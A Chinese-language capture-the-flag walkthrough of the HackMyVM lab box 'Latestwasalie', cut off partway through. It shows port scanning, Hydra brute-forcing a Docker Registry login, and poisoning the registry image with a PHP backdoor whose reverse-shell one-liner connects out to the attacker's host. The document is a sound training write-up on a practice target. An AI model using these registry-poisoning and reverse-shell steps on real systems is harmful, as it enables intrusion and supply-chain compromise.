HackMyVM-Latestwasalie

来吧 来吧 再来一杯吧

去吧 去吧 都离我而去吧

靶机ip:192.168.56.51

难度:低(个人认为算中等)

涉及内容:

信息收集与枚举: 端口扫描、虚拟主机 (Vhost) 识别、Docker Registry API 探测。

凭证爆破: 基于 HTTP Basic Auth 的 Hydra 字典爆破。

供应链攻击 (Supply Chain Attack): 私有镜像仓库投毒、Skopeo 镜像拉取与推送、Docker Commit 构建恶意镜像。

容器逃逸 (Container Escape): 利用宿主机与容器的共享挂载目录 (Shared Volume)、Cron 定时任务滥用。

通配符注入 (Wildcard Injection): 滥用 rsync 命令参数解析机制实现任意命令执行。

权限提升 (Privilege Escalation): SUID 滥用 (touch)、宿主机进程监控 (pspy64)。

端口扫描:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 192.168.56.51
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-17 13:55 +0000
Nmap scan report for 192.168.56.51
Host is up (0.0082s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5000/tcp open  upnp
MAC Address: 08:00:27:6F:9C:3C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.57 seconds

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 192.168.56.51 -sC -sV -T4 -A
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-17 13:56 +0000
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 13:57 (0:00:08 remaining)
Nmap scan report for 192.168.56.51
Host is up (0.0034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 10.0p2 Debian 7+deb13u2 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.66 ((Debian))
|_http-title: Default site
|_http-server-header: Apache/2.4.66 (Debian)
5000/tcp open  http    Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
MAC Address: 08:00:27:6F:9C:3C (Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   3.37 ms 192.168.56.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.81 seconds

docker服务?这可不常见啊.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 192.168.56.51
curl: (7) Failed to connect to 192.168.56.51 port 80 after 2 ms: Could not connect to server
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 192.168.56.51
<!DOCTYPE html>
<html>
<head>
  <title>Default site</title>
  <meta http-equiv="Refresh" content="10; URL=http://latestwasalie.hmv/" />
</head>
<body>
  <h1>Default site</h1>
  <p>No application configured for this host.</p>
  <p>Check the available files on this server.</p>
</body>
</html>

加入hosts

1
192.168.56.51 latestwasalie.hmv
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl http://latestwasalie.hmv/
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Latest Was A Lie</title>
  <style>
    :root{
      --bg-1:#0b1020;
      --bg-2:#131a2e;
      --card:rgba(255,255,255,0.08);
      --card-border:rgba(255,255,255,0.16);
      --text:#eef2ff;
      --muted:#a8b3cf;
      --accent:#7c5cff;
      --accent-2:#00d4ff;
      --success:#39d98a;
      --shadow:0 20px 60px rgba(0,0,0,0.35);
      --radius:24px;
    }

    * { box-sizing: border-box; }

    html, body {
      margin: 0;
      padding: 0;
      min-height: 100%;
      font-family: Inter, ui-sans-serif, system-ui, -apple-system, Segoe UI, Roboto, Helvetica, Arial, sans-serif;
      color: var(--text);
      background:
        radial-gradient(circle at 15% 20%, rgba(124,92,255,0.22), transparent 30%),
        radial-gradient(circle at 85% 30%, rgba(0,212,255,0.18), transparent 30%),
        radial-gradient(circle at 50% 80%, rgba(57,217,138,0.10), transparent 25%),
        linear-gradient(135deg, var(--bg-1), var(--bg-2));
      overflow-x: hidden;
    }

    body::before,
    body::after{
      content:"";
      position: fixed;
      width: 34rem;
      height: 34rem;
      border-radius: 999px;
      filter: blur(80px);
      opacity: 0.24;
      z-index: 0;
      pointer-events: none;
      animation: floatBlob 14s ease-in-out infinite;
    }

    body::before{
      top: -8rem;
      left: -10rem;
      background: var(--accent);
    }

    body::after{
      right: -10rem;
      bottom: -10rem;
      background: var(--accent-2);
      animation-delay: -7s;
    }

    @keyframes floatBlob {
      0%, 100% { transform: translate(0,0) scale(1); }
      50% { transform: translate(2rem, -1rem) scale(1.08); }
    }

    .grid-bg{
      position: fixed;
      inset: 0;
      background-image:
        linear-gradient(rgba(255,255,255,0.03) 1px, transparent 1px),
        linear-gradient(90deg, rgba(255,255,255,0.03) 1px, transparent 1px);
      background-size: 40px 40px;
      mask-image: radial-gradient(circle at center, black 45%, transparent 85%);
      z-index: 0;
      pointer-events: none;
    }

    .container{
      position: relative;
      z-index: 1;
      width: min(1180px, calc(100% - 32px));
      margin: 0 auto;
      padding: 32px 0 48px;
    }

    .nav{
      display:flex;
      justify-content:space-between;
      align-items:center;
      gap:16px;
      margin-bottom: 30px;
    }

    .brand{
      display:flex;
      align-items:center;
      gap:14px;
      font-weight:700;
      letter-spacing:0.02em;
    }

    .brand-badge{
      width:42px;
      height:42px;
      border-radius:14px;
      background: linear-gradient(135deg, rgba(124,92,255,0.85), rgba(0,212,255,0.85));
      display:grid;
      place-items:center;
      box-shadow: var(--shadow);
      flex-shrink:0;
    }

    .brand-badge svg{
      width:24px;
      height:24px;
    }

    .version-chip{
      display:inline-flex;
      align-items:center;
      gap:10px;
      padding:10px 16px;
      border:1px solid var(--card-border);
      border-radius:999px;
      background: rgba(255,255,255,0.06);
      backdrop-filter: blur(10px);
      color: var(--muted);
      font-size: 0.95rem;
      box-shadow: var(--shadow);
    }

    .version-dot{
      width:10px;
      height:10px;
      border-radius:999px;
      background: var(--success);
      box-shadow: 0 0 18px rgba(57,217,138,0.7);
      animation: pulse 2s infinite;
    }

    @keyframes pulse {
      0%,100% { transform: scale(1); opacity: 1; }
      50% { transform: scale(1.4); opacity: 0.65; }
    }

    .hero{
      display:grid;
      grid-template-columns: 1.15fr 0.85fr;
      gap:24px;
      align-items:stretch;
      margin-bottom: 24px;
    }

    .panel{
      border:1px solid var(--card-border);
      background: var(--card);
      backdrop-filter: blur(12px);
      border-radius: var(--radius);
      box-shadow: var(--shadow);
    }

    .hero-copy{
      padding: 34px;
      position:relative;
      overflow:hidden;
    }

    .eyebrow{
      display:inline-flex;
      align-items:center;
      gap:10px;
      padding:8px 12px;
      margin-bottom:18px;
      border-radius:999px;
      background: rgba(124,92,255,0.13);
      border:1px solid rgba(124,92,255,0.28);
      color:#d9d0ff;
      font-size:0.92rem;
    }

    .eyebrow .spark{
      width:8px;
      height:8px;
      border-radius:50%;
      background: linear-gradient(135deg, var(--accent), var(--accent-2));
      box-shadow: 0 0 18px rgba(124,92,255,0.9);
    }

    h1{
      margin: 0 0 14px;
      font-size: clamp(2.4rem, 4vw, 4.5rem);
      line-height: 0.95;
      letter-spacing: -0.04em;
    }

    .gradient-text{
      background: linear-gradient(90deg, #fff, #cfc8ff 40%, #9cefff 100%);
      -webkit-background-clip: text;
      background-clip: text;
      color: transparent;
    }

    .lead{
      margin: 0;
      max-width: 58ch;
      color: var(--muted);
      font-size: 1.05rem;
      line-height: 1.7;
    }

    .hero-actions{
      display:flex;
      flex-wrap:wrap;
      gap:12px;
      margin-top:28px;
    }

    .btn{
      display:inline-flex;
      align-items:center;
      gap:10px;
      text-decoration:none;
      color:var(--text);
      padding:14px 18px;
      border-radius:16px;
      border:1px solid var(--card-border);
      background: rgba(255,255,255,0.06);
      transition: transform .2s ease, background .2s ease, border-color .2s ease;
      font-weight:600;
    }

    .btn:hover{
      transform: translateY(-2px);
      background: rgba(255,255,255,0.1);
      border-color: rgba(255,255,255,0.26);
    }

    .btn.primary{
      background: linear-gradient(135deg, rgba(124,92,255,0.95), rgba(0,212,255,0.85));
      border-color: transparent;
      color: white;
    }

    .stats{
      display:grid;
      grid-template-columns: repeat(3, 1fr);
      gap:14px;
      margin-top:28px;
    }

    .stat{
      padding:16px;
      border-radius:18px;
      background: rgba(255,255,255,0.04);
      border:1px solid rgba(255,255,255,0.08);
    }

    .stat strong{
      display:block;
      font-size:1.15rem;
      margin-bottom:4px;
    }

    .stat span{
      color: var(--muted);
      font-size:0.92rem;
    }

    .hero-visual{
      padding: 24px;
      display:grid;
      place-items:center;
      min-height: 440px;
      position:relative;
      overflow:hidden;
    }

    .orbital{
      width:min(100%, 420px);
      aspect-ratio:1/1;
      position:relative;
    }

    .orbital svg{
      width:100%;
      height:100%;
      display:block;
      filter: drop-shadow(0 12px 32px rgba(0,0,0,0.3));
    }

    .cards{
      display:grid;
      grid-template-columns: repeat(3, 1fr);
      gap:24px;
    }

    .card{
      padding:24px;
    }

    .card h3{
      margin:0 0 10px;
      font-size:1.05rem;
    }

    .card p{
      margin:0;
      color: var(--muted);
      line-height:1.7;
      font-size:0.97rem;
    }

    .icon{
      width:42px;
      height:42px;
      border-radius:14px;
      display:grid;
      place-items:center;
      margin-bottom:16px;
      background: linear-gradient(135deg, rgba(124,92,255,0.18), rgba(0,212,255,0.14));
      border:1px solid rgba(255,255,255,0.1);
    }

    .footer{
      margin-top: 28px;
      text-align:center;
      color: var(--muted);
      font-size: 0.94rem;
      padding: 18px 0 10px;
    }

    .scanline{
      position:absolute;
      left:0;
      right:0;
      height:120px;
      background: linear-gradient(to bottom, transparent, rgba(255,255,255,0.08), transparent);
      filter: blur(18px);
      animation: scan 6s linear infinite;
      opacity:.35;
    }

    @keyframes scan {
      0% { top: -20%; }
      100% { top: 120%; }
    }

    .tiny{
      font-size:0.82rem;
      color:#c8d0e8;
      opacity:.78;
      margin-top:10px;
    }

    @media (max-width: 980px){
      .hero{
        grid-template-columns: 1fr;
      }
      .cards{
        grid-template-columns: 1fr;
      }
    }

    @media (max-width: 680px){
      .nav{
        flex-direction:column;
        align-items:flex-start;
      }
      .hero-copy{
        padding:24px;
      }
      .hero-visual{
        min-height: 320px;
      }
      .stats{
        grid-template-columns:1fr;
      }
    }
  </style>
</head>
<body>
  <div class="grid-bg"></div>

  <div class="container">
    <div class="nav">
      <div class="brand">
        <div class="brand-badge" aria-hidden="true">
          <svg viewBox="0 0 24 24" fill="none">
            <path d="M12 3l7 4v10l-7 4-7-4V7l7-4z" stroke="white" stroke-width="1.5"/>
            <path d="M8 10.5l4-2.2 4 2.2v4.2l-4 2.1-4-2.1v-4.2z" fill="white" fill-opacity="0.18" stroke="white" stroke-width="1.2"/>
          </svg>
        </div>
        <div>
          <div>LWAL Platform</div>
          <div class="tiny">Enterprise infrastructure, built for scale.</div>
        </div>
      </div>

      <div class="version-chip">
        <span class="version-dot"></span>
        <span>Platform release <strong>1.0</strong></span>
      </div>
    </div>

    <section class="hero">
      <div class="panel hero-copy">
        <div class="scanline"></div>

        <div class="eyebrow">
          <span class="spark"></span>
          Trusted by modern teams
        </div>

        <h1>
          <span class="gradient-text">Build faster.</span><br>
          Operate smarter.
        </h1>

        <p class="lead">
          A unified platform for modern digital operations, helping teams deliver reliable services,
          improve visibility and move with confidence.
        </p>

        <div class="hero-actions">
          <a class="btn primary" href="#services">Explore services</a>
          <a class="btn" href="#overview">Company overview</a>
        </div>

        <div class="stats" id="overview">
          <div class="stat">
            <strong>24/7</strong>
            <span>Operational coverage</span>
          </div>
          <div class="stat">
            <strong>Global</strong>
            <span>Distributed infrastructure</span>
          </div>
          <div class="stat">
            <strong>1.0</strong>
            <span>Current platform release</span>
          </div>
        </div>
      </div>

      <div class="panel hero-visual" aria-hidden="true">
        <div class="orbital">
          <svg viewBox="0 0 500 500" fill="none" xmlns="http://www.w3.org/2000/svg">
            <defs>
              <linearGradient id="ring1" x1="0" y1="0" x2="500" y2="500">
                <stop offset="0%" stop-color="#7C5CFF"/>
                <stop offset="100%" stop-color="#00D4FF"/>
              </linearGradient>
              <linearGradient id="ring2" x1="500" y1="0" x2="0" y2="500">
                <stop offset="0%" stop-color="#39D98A"/>
                <stop offset="100%" stop-color="#7C5CFF"/>
              </linearGradient>
              <filter id="glow">
                <feGaussianBlur stdDeviation="6" result="b"/>
                <feMerge>
                  <feMergeNode in="b"/>
                  <feMergeNode in="SourceGraphic"/>
                </feMerge>
              </filter>
            </defs>

            <circle cx="250" cy="250" r="170" stroke="url(#ring1)" stroke-width="2" opacity="0.5">
              <animateTransform attributeName="transform" type="rotate" from="0 250 250" to="360 250 250" dur="24s" repeatCount="indefinite"/>
            </circle>

            <circle cx="250" cy="250" r="120" stroke="url(#ring2)" stroke-width="2" opacity="0.45" stroke-dasharray="8 12">
              <animateTransform attributeName="transform" type="rotate" from="360 250 250" to="0 250 250" dur="18s" repeatCount="indefinite"/>
            </circle>

            <g filter="url(#glow)">
              <circle cx="250" cy="250" r="76" fill="rgba(255,255,255,0.04)" stroke="rgba(255,255,255,0.22)"/>
              <path d="M250 192l48 28v60l-48 28-48-28v-60l48-28z" fill="url(#ring1)" opacity="0.9"/>
              <path d="M250 212l30 17v42l-30 17-30-17v-42l30-17z" fill="#0b1020" opacity="0.75"/>
            </g>

            <circle r="8" fill="#00D4FF">
              <animateMotion dur="10s" repeatCount="indefinite" rotate="auto">
                <mpath href="#orbit-a"/>
              </animateMotion>
            </circle>

            <circle r="6" fill="#39D98A">
              <animateMotion dur="7s" repeatCount="indefinite" rotate="auto">
                <mpath href="#orbit-b"/>
              </animateMotion>
            </circle>

            <path id="orbit-a" d="M 420 250 A 170 170 0 1 1 419.9 250" fill="none"/>
            <path id="orbit-b" d="M 370 250 A 120 120 0 1 0 369.9 250" fill="none"/>
          </svg>
        </div>
      </div>
    </section>

    <section class="cards" id="services">
      <div class="panel card">
        <div class="icon">
          <svg width="22" height="22" viewBox="0 0 24 24" fill="none">
            <path d="M12 3l8 4.5v9L12 21l-8-4.5v-9L12 3z" stroke="white" stroke-width="1.5"/>
          </svg>
        </div>
        <h3>Infrastructure</h3>
        <p>
          Resilient services designed to support high-availability workloads across modern environments.
        </p>
      </div>

      <div class="panel card">
        <div class="icon">
          <svg width="22" height="22" viewBox="0 0 24 24" fill="none">
            <path d="M4 12h16M12 4v16" stroke="white" stroke-width="1.5" stroke-linecap="round"/>
          </svg>
        </div>
        <h3>Operations</h3>
        <p>
          Streamlined workflows that help teams maintain consistency, visibility and execution at scale.
        </p>
      </div>

      <div class="panel card">
        <div class="icon">
          <svg width="22" height="22" viewBox="0 0 24 24" fill="none">
            <path d="M5 12l4 4L19 6" stroke="white" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round"/>
          </svg>
        </div>
        <h3>Delivery</h3>
        <p>
          Faster release cycles with a platform experience built to support growth, reliability and trust.
        </p>
      </div>
    </section>

    <div class="footer">
      © 2026 LWAL Platform. All rights reserved.
    </div>
  </div>
</body>
</html>
<!-- Last deployment on April 6, 2026 by adm -->

下面有一个用户名adm

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# dirsearch -u http://latestwasalie.hmv/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                    
                                                                                                                                                           
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_latestwasalie.hmv/__26-04-17_14-01-04.txt

Target: http://latestwasalie.hmv/

[14:01:04] Starting:                                                                                                                                       
[14:01:11] 403 -  322B  - /.ht_wsr.txt                                      
[14:01:11] 403 -  322B  - /.htaccess_orig                                   
[14:01:11] 403 -  322B  - /.htaccess_extra                                  
[14:01:11] 403 -  322B  - /.htaccess.sample                                 
[14:01:11] 403 -  322B  - /.htaccessOLD2
[14:01:11] 403 -  322B  - /.htaccessBAK                                     
[14:01:11] 403 -  322B  - /.html
[14:01:11] 403 -  322B  - /.htaccess_sc                                     
[14:01:11] 403 -  322B  - /.htaccess.orig                                   
[14:01:11] 403 -  322B  - /.htaccess.bak1
[14:01:11] 403 -  322B  - /.htm                                             
[14:01:11] 403 -  322B  - /.htaccessOLD
[14:01:11] 403 -  322B  - /.htpasswds                                       
[14:01:11] 403 -  322B  - /.htaccess.save                                   
[14:01:11] 403 -  322B  - /.htpasswd_test                                   
[14:01:12] 403 -  322B  - /.httr-oauth                                      
[##                  ] 11%   1328/11460        99/s       job:1/1  errors:0Exception in thread Thread-19 (thread_proc):
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/dirsearch/lib/core/fuzzer.py", line 261, in thread_proc
    self.scan(self._base_path + path, scanners)
    ~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/dirsearch/lib/core/fuzzer.py", line 168, in scan
    response = self._requester.request(path)
  File "/usr/lib/python3/dist-packages/dirsearch/lib/connection/requester.py", line 222, in request
    raise RequestException(err_msg)
lib.core.exceptions.RequestException: Cannot connect to: latestwasalie.hmv

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.13/threading.py", line 1044, in _bootstrap_inner
    self.run()
    ~~~~~~~~^^
  File "/usr/lib/python3.13/threading.py", line 995, in run
    self._target(*self._args, **self._kwargs)
    ~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/dirsearch/lib/core/fuzzer.py", line 268, in thread_proc
    callback(e)
    ~~~~~~~~^^^
  File "/usr/lib/python3/dist-packages/dirsearch/lib/controller/controller.py", line 482, in raise_error
    raise SkipTargetInterrupt("Too many request errors")
lib.core.exceptions.SkipTargetInterrupt: Too many request errors
[##                  ] 12%   1404/11460        75/s       job:1/1  errors:76Exception in thread Thread-35 (thread_proc):
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/dirsearch/lib/core/fuzzer.py", line 261, in thread_proc

这里有个点非常有意思

dirsearch扫描会扫一半断掉,一开始我以为是做了针对速率和IP和限制,但是我更换了不同IP,加了不同请求头,限制扫描速率后还是一样,甚至断的更早.

结合之前的curl80端口错误,和docker端口开放,大家有没有想到什么?

再想想靶机名字,Latestwasalie(最新的是个谎言)

没错,这整个80端口都是一个docker容器,被后台的定时任务不断构建推送,然后刷新.

那我们就可以从源头入手,既然5000端口开了docker服务,可以构造恶意镜像进行投毒.

先用这个用户名adm试一下.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# 
hydra -l adm -P /usr/share/wordlists/rockyou.txt -s 5000 -t 4 -vV 192.168.56.51 http-get /v2/_catalog
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "marie1" - 961 of 14344399 [child 2] (0/0)
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "anita" - 962 of 14344399 [child 0] (0/0)
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "lover1" - 963 of 14344399 [child 1] (0/0)
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "chicago" - 964 of 14344399 [child 3] (0/0)
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "twinkle" - 965 of 14344399 [child 2] (0/0)
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "pantera" - 966 of 14344399 [child 0] (0/0)
[5000][http-get] host: 192.168.56.51   login: adm   password: lover1
[STATUS] attack finished for 192.168.56.51 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-04-17 14:11:22

得到密码lover1

接下来拉取镜像,这里使用的工具是skopeo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# env -u http_proxy -u https_proxy -u all_proxy skopeo copy \
  --src-tls-verify=false \
  --src-creds=adm:lover1 \
  docker://192.168.56.51:5000/latestwasalie-web:latest \
  docker-daemon:latestwasalie-web:local
Getting image source signatures
Copying blob 5435b2dcdf5c done   | 
Copying blob 876337e68f5f done   | 
Copying blob 1318fd64553d done   | 
Copying blob 123d02a4714c done   | 
Copying blob 5d62a3b287ed done   | 
Copying blob 72997373dd6a done   | 
Copying blob 2b72ce02b7bc done   | 
Copying blob 46e3bfe285c0 done   | 
Copying blob 082e4b533cba done   | 
Copying blob 4cf495241136 done   | 
Copying blob 1d50649d3518 done   | 
Copying blob f40934428615 done   | 
Copying blob 4817620bffb9 done   | 
Copying blob 82b4191aede9 done   | 
Copying blob 4f4fb700ef54 done   | 
Copying blob 761cb6d17f6b done   | 
Copying blob 8a918d925f64 done   | 
Copying blob c2c212622156 done   | 
Copying blob 216dddf9cde1 done   | 
Copying blob 81fdb26c0284 done   | 
Copying blob cdc3b4e4c682 done   | 
Copying blob e26f4e8ab430 done   | 
Copying blob 7463a3667b9b done   | 
Copying blob ea9e4fb5131b done   | 
Copying config 601e268a38 done   | 
Writing manifest to image destination
                                                           
1
2
3
4
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# docker images
REPOSITORY              TAG       IMAGE ID       CREATED        SIZE
latestwasalie-web       local     601e268a3809   6 days ago     499MB

加一个后门php文件

1
2
3
4
5
6
cat > rev.php << 'EOF'
<?php
system("php -r '\$sock=fsockopen(\"192.168.56.104\", 4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'");
?>
EOF

查看网站根目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root㉿kaada)-[/tmp]
└─# docker exec temp-poison sh -c '
echo "=== 常见网站目录 ===";
ls -l /var/www /var/www/html /app /public /www /usr/share/nginx/html 2>/dev/null;
echo "=== 包含PHP文件的目录 ===";
find / -name "*.php" -type f 2>/dev/null | head -15;
'
=== 常见网站目录 ===
/var/www:
total 12
drwxr-xr-x 1 www-data www-data 4096 Apr  4 05:48 default
drwxrwxrwt 2 www-data www-data 4096 Apr  7 01:37 html
drwxr-xr-x 1 www-data www-data 4096 Apr  4 10:35 latestwasalie

/var/www/html:
total 0
=== 包含PHP文件的目录 ===
/var/www/latestwasalie/export.php
/var/www/latestwasalie/index.php
/usr/local/lib/php/test/Structures_Graph/tests/BasicGraphTest.php
/usr/local/lib/php/test/Structures_Graph/tests/AcyclicTestTest.php
/usr/local/lib/php/test/Structures_Graph/tests/TopologicalSorterTest.php
/usr/local/lib/php/test/XML_Util/tests/CreateStartElementTests.php
/usr/local/lib/php/test/XML_Util/tests/GetXmlDeclarationTests.php
/usr/local/lib/php/test/XML_Util/tests/ReplaceEntitiesTests.php
/usr/local/lib/php/test/XML_Util/tests/Bug18343Tests.php
/usr/local/lib/php/test/XML_Util/tests/CollapseEmptyTagsTests.php
/usr/local/lib/php/test/XML_Util/tests/Bug21177Tests.php
/usr/local/lib/php/test/XML_Util/tests/CreateTagTests.php
/usr/local/lib/php/test/XML_Util/tests/RaiseErrorTests.php
/usr/local/lib/php/test/XML_Util/tests/CreateCDataSectionTests.php
/usr/local/lib/php/test/XML_Util/tests/Bug5392Tests.php

确认为/var/www/latestwasalie/

投毒并提交

1
2
3
4
5
6
7
8
┌──(root㉿kaada)-[/tmp]
└─# docker cp backdoor.php temp-poison:/var/www/latestwasalie/backdoor.php
Successfully copied 2.56kB to temp-poison:/var/www/latestwasalie/backdoor.php
                                                                                                                                                           
┌──(root㉿kaada)-[/tmp]
└─# docker commit temp-poison latestwasalie-web:poisoned
sha256:f680b5205f8490523b570a6a0a374719262af1edbe9ed912ee7655f42873e7fb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root㉿kaada)-[/tmp]
└─# env -u http_proxy -u https_proxy -u all_proxy skopeo copy \
  --dest-tls-verify=false \
  --dest-creds=adm:lover1 \
  docker-daemon:latestwasalie-web:poisoned \
  docker://192.168.56.51:5000/latestwasalie-web:latest
Getting image source signatures
Copying blob d3339728e686 done   | 
Copying blob 990167fcb4f9 done   | 
Copying blob 0f78731cb05b done   | 
Copying blob 60e70dddd9ea done   | 
Copying blob d59b63a13295 done   | 
Copying blob 23597ba15647 done   | 
Copying blob 2756d22f5a12 done   | 
Copying blob dae76f447ff7 done   | 
Copying blob f1994e1f158d done   | 
Copying blob 9a58c6adc2dc done   | 
Copying blob f61c35af2e8f done   | 
Copying blob aef25a37b2ed done   | 
Copying blob 613610e40207 done   | 
Copying blob 9b944a6755e9 done   | 
Copying blob 5f70bf18a086 done   | 
Copying blob 0f649923b77c done   | 
Copying blob 1f8c0f521d5c done   | 
Copying blob f3a194582180 done   | 
Copying blob 5e2ae2651790 done   | 
Copying blob 27d152ddda0a done   | 
Copying blob f0145cef6f01 done   | 
Copying blob 70ff88667c41 done   | 
Copying blob e69b40db28bf done   | 
Copying blob d9e8deaea142 done   | 
Copying blob b3e1a9d78725 done   | 
Copying config f680b5205f done   | 
Writing manifest to image destination

本地起一个4444端口监听,反弹shell

1
curl http://latestwasalie.hmv/backdoor.php
1
2
3
4
5
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.51] 54434

注意,这里由于容器更新的很快,操作要十分迅速,不然很快就会断掉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ cd ..
$ ls /
bin
boot
data
dev
etc
home
host-bin
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

注意到有个data目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvnp 4444         
listening on [any] 4444 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.51] 50640
/bin/sh: 0: can't access tty; job control turned off
$ cd /data
$ ls
exports
state
$ cd ex
/bin/sh: 3: cd: can't cd to ex
$ cd exports
$ ls -al
total 28
drwxrwxrwx 2 root root 4096 Apr 10 18:08 .
